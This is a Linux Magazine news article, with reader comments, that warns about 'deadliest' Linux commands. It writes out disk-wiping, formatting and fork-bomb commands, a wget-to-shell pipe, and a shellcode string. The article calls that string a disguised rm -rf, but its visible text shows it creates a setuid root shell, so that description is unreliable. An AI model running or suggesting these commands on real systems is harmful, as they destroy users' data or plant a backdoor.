Seven Deadliest Linux Commands
In a TechSource Blog blog, Philippine technology student Jun Auza has assembled a list of the seven deadliest Linux commands, which his readers promptly augmented.
Auza warns new forum and chat participants not to fall into the trap of calling each other "dumbheads."
CAUTION! All commands included in the blog and that appear here actually destroy a complete Linux system. Those wishing to try them should do so on a separate, virtual machine. Please proceed at your own risk!
The first, classic deadly command is certainly:
rm -rf/
The command starts at root and will forcefully delete all files recursively. The result: the hard disk and all relevant files are wiped out.
A corollary to the first deadly command is its hex equivalent:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
According to Auza, this encrypted version of rm -rf/ can "deceive even the rather experienced Linux users."
A deletion that might proceed somewhat faster than a complete hard disk wipeout is:
mkfs.ext3 /dev/sda
The command will do horrible things to sda.
If losing data were bad enough, consider this command:
:(){:|:&};:
It executes enough processes to freeze your system and completely corrupt your data. It is also known as the "forkbomb." Should you use the command in a startup script, at least a system message will mitigate the effect.
Back to the hard disk, with this command:
any_command > /dev/sda
The any_command can be for a favorite program that might output some terminal data, but in this case it writes it to the sda hard disk. As a rule, all data will span partitions and the entire filesystem will cross the River Styx.
Even Linux has so-called rootkits, malware that takes control of root and transforms the PC into an unwilling zombie. All you need is some_untrusted_source on the Web and use wget on it:
wget http:// some_untrusted_source -O- | sh
The command certainly invites trouble from the untrusted URL in the way of possible rootkits with malicious code.
The last of the seven deadliest commands Auza calls the /dev/null trick:
mv /home/my_home_directory/* /dev/null
Everything you move to /dev/null, such as your favorite home directory, will end up in the Big Garbage Heap.
As the responses to the blog steadily grow, many additional ways to destroy your Linux system are beginning to emerge. A prominent one is:
dd if=/dev/urandom of=/dev/sda
This fills the sda disk with random numbers. Oh joy!
Users should be especially wary of requests involving root privileges, the rm -rf or dd commands, redirection (via "|" and ">"), or using a hard disk (such as /dev/sda) as a parameter.
Comments
comments powered by DisqusSubscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
Fedora Asahi Remix 41 Available for Apple Silicon
If you have an Apple Silicon Mac and you're hoping to install Fedora, you're in luck because the latest release supports the M1 and M2 chips.
-
Systemd Fixes Bug While Facing New Challenger in GNU Shepherd
The systemd developers have fixed a really nasty bug amid the release of the new GNU Shepherd init system.
-
AlmaLinux 10.0 Beta Released
The AlmaLinux OS Foundation has announced the availability of AlmaLinux 10.0 Beta ("Purple Lion") for all supported devices with significant changes.
-
Gnome 47.2 Now Available
Gnome 47.2 is now available for general use but don't expect much in the way of newness, as this is all about improvements and bug fixes.
-
Latest Cinnamon Desktop Releases with a Bold New Look
Just in time for the holidays, the developer of the Cinnamon desktop has shipped a new release to help spice up your eggnog with new features and a new look.
-
Armbian 24.11 Released with Expanded Hardware Support
If you've been waiting for Armbian to support OrangePi 5 Max and Radxa ROCK 5B+, the wait is over.
-
SUSE Renames Several Products for Better Name Recognition
SUSE has been a very powerful player in the European market, but it knows it must branch out to gain serious traction. Will a name change do the trick?
-
ESET Discovers New Linux Malware
WolfsBane is an all-in-one malware that has hit the Linux operating system and includes a dropper, a launcher, and a backdoor.
-
New Linux Kernel Patch Allows Forcing a CPU Mitigation
Even when CPU mitigations can consume precious CPU cycles, it might not be a bad idea to allow users to enable them, even if your machine isn't vulnerable.
-
Red Hat Enterprise Linux 9.5 Released
Notify your friends, loved ones, and colleagues that the latest version of RHEL is available with plenty of enhancements.
jdong
Even more deadly
$ source ~/.bash_history
Well, how would you clean up THIS mess you just made?
data protection
Not really that dangerous....
Mind you, people would need to be signed in as root for these commands to do any significant damage (sudo or su will do), but as I keep saying to people, if they don't backup data they deserve to lose it.
Dad just lost 4 years of digital photos from a HDD crash--no funny commands there, and had prior to that his system plagued by virii before switching to GNU/Linux.
Other than that, great article!
stolen indeed
Not convinced? Let's look at a quick side-by-side:
Blog:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
UF announcement:
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
Blog:
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
UF annoucnement
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data
If you think this wording choice is similar only by coincidence, then fine.
not stolen
Stolen from UbuntuForums announcement